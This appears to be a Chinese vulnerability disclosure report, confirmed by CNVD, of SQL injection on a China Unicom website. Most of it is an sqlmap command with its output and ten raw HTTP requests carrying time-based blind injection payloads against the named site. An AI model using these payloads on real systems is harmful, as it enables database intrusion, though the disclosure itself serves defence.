2015-08-04: 细节已通知厂商并且等待厂商处理中 2015-08-06: 厂商已经确认,细节仅向厂商公开 2015-08-16: 细节向核心白帽子及相关领域专家公开 2015-08-26: 细节向普通白帽子公开 2015-09-05: 细节向实习白帽子公开 2015-09-20: 细节向公众公开
只为能上个首页而已
sqlmap.py -u "http://www.chinaunicom-a.com/chinaunicom.do?field=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&frametype=4&season=3&size=20&start=1&year=" --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: fast=1&field=if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5)))uWAF) AND 'ozgN'='ozgN'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/&frametype=2&month=&search=&season=&size=16&start=1&year=---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3back-end DBMS: MySQL 5.0.12current database: 'ChinaUnicom'tem: Linux CentOS 5.10web application technology: Apache 2.2.3, JSPback-end DBMS: MySQL 5.0.12current database: 'ChinaUnicom'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://www.chinaunicom-a.com:80/chinaunicom.do?field=(select(0)from(select(sleep(0)))v)/' AND (SELECT * FROM (SELECT(SLEEP(5)))CULU) AND 'FNqF'='FNqF'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/&frametype=4&season=3&size=20&start=1&year=---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, JSPback-end DBMS: MySQL 5.0.12current database: 'ChinaUnicom'
第二处:
POST /chinaunicom.do HTTP/1.1Content-Length: 204Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.chinaunicom-a.com:80/Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2Host: www.chinaunicom-a.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*fast=1&field=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&frametype=2&month=&search=&season=&size=16&start=1&year=
第三处:
POST /chinaunicom.do HTTP/1.1Content-Length: 208Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.chinaunicom-a.com:80/Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2Host: www.chinaunicom-a.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*fast=1&field=glzd&frametype=2&month=&search=&season=&size=16&start=1&year=
第四处:
POST /chinaunicom.do HTTP/1.1Content-Length: 208Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.chinaunicom-a.com:80/Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2Host: www.chinaunicom-a.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*fast=1&field=glzd&frametype=2&month=&search=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&season=&size=16&start=1&year=
第五处:
POST /chinaunicom.do HTTP/1.1Content-Length: 1136Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_GVYKMYTBQIX-Requested-With: XMLHttpRequestReferer: http://www.chinaunicom-a.com:80/Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2Host: www.chinaunicom-a.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_TNFOEBSVKH-------AcunetixBoundary_TNFOEBSVKHContent-Disposition: form-data; name="fast"1-------AcunetixBoundary_TNFOEBSVKHContent-Disposition: form-data; name="field"ltgg-------AcunetixBoundary_TNFOEBSVKHContent-Disposition: form-data; name="frametype"9-------AcunetixBoundary_TNFOEBSVKHContent-Disposition: form-data; name="imageField2"-------AcunetixBoundary_TNFOEBSVKHContent-Disposition: form-data; name="month"-------AcunetixBoundary_TNFOEBSVKHContent-Disposition: form-data; name="search"-------AcunetixBoundary_TNFOEBSVKHContent-Disposition: form-data; name="search2"e%' AND 3*2*1=6 AND '000WQWL'!='000WQWL%-------AcunetixBoundary_TNFOEBSVKHContent-Disposition: form-data; name="season"-------AcunetixBoundary_TNFOEBSVKHContent-Disposition: form-data; name="size"10-------AcunetixBoundary_TNFOEBSVKHContent-Disposition: form-data; name="start"1-------AcunetixBoundary_TNFOEBSVKHContent-Disposition: form-data; name="year"2015-------AcunetixBoundary_TNFOEBSVKHContent-Disposition: form-data; name="year1"-------AcunetixBoundary_TNFOEBSVKH--
第六处:
POST /chinaunicom.do HTTP/1.1Content-Length: 208Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.chinaunicom-a.com:80/Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2Host: www.chinaunicom-a.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*fast=1&field=glzd&frametype=2&month=&search=&season=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&size=16&start=1&year=
第七处:
http://www.chinaunicom-a.com:80//chinaunicom.do?field=dqbg&frametype=4&season=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&size=20&start=1&year=
第八处:
POST /chinaunicom.do HTTP/1.1Content-Length: 208Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.chinaunicom-a.com:80/Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2Host: www.chinaunicom-a.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*fast=1&field=glzd&frametype=2&month=&search=&season=&size=16&start=1&year=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/
第九处:
POST /chinaunicom.do HTTP/1.1Content-Length: 202Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.chinaunicom-a.com:80/Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2Host: www.chinaunicom-a.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*field=pgsms&frametype=7&month=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&search=&season=&size=20&start=1&year=
第十处:
POST /search.do HTTP/1.1Content-Length: 345Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_BAXFSAEFBUX-Requested-With: XMLHttpRequestReferer: http://www.chinaunicom-a.com:80/Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2Host: www.chinaunicom-a.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_XTWDESPVHX-------AcunetixBoundary_XTWDESPVHXContent-Disposition: form-data; name="field"index-------AcunetixBoundary_XTWDESPVHXContent-Disposition: form-data; name="imageField"-------AcunetixBoundary_XTWDESPVHXContent-Disposition: form-data; name="search"-1' OR 3*2*1=6 AND 000711=000711 -- -------AcunetixBoundary_XTWDESPVHX--
参数过滤
危害等级:高
漏洞Rank:12
确认时间:2015-08-06 18:41
CNVD确认并复现所述情况,已经转由CNCERT向中国联合网络通信股份有限公司通报,由其后续协调网站管理部门处置。
暂无